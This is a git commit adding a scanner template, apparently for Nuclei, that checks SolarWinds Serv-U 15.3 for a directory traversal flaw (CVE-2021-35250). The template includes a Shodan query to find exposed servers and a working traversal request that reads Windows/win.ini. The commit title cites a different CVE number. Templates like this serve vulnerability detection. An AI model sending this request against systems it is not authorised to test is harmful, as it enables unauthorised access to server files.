Create CVE-2021-35320.yaml (#7068)

* Create CVE-2021-35320.yaml

* Update CVE-2021-35320.yaml

* Update CVE-2021-35320.yaml

* Update CVE-2021-35320.yaml

* Update CVE-2021-35320.yaml

* Update CVE-2021-35320.yaml

* CVE ID and metadata update

---------

Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>

cves/2021/CVE-2021-35250.yaml

@@ -0,0 +1,41 @@
+id: CVE-2021-35250
+
+info:
+  name: SolarWinds Serv-U 15.3 - Directory Traversal
+  author: johnk3r,pdteam
+  severity: high
+  description: |
+    A researcher reported a Directory Traversal Vulnerability in Serv-U 15.3. This may allow access to files relating to the Serv-U installation and server files. This issue has been resolved in Serv-U 15.3 Hotfix 1.
+  reference:
+    - https://github.com/rissor41/SolarWinds-CVE-2021-35250
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-35250
+    - https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-15-3-HotFix-1?language=en_US
+    - https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35250
+    - https://twitter.com/shaybt12/status/1646966578695622662?s=43&t=5HOgSFut7Y75N7CBHEikSg
+  metadata:
+    shodan-query: product:"Rhinosoft Serv-U httpd"
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.5
+    cve-id: CVE-2021-35250
+  tags: cve,cve2021,solarwinds,traversal
+
+requests:
+  - raw:
+      - |
+        POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        /?Command=NOOP
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "\\[(font|extension|file)s\\]"
+
+      - type: status
+        status:
+          - 401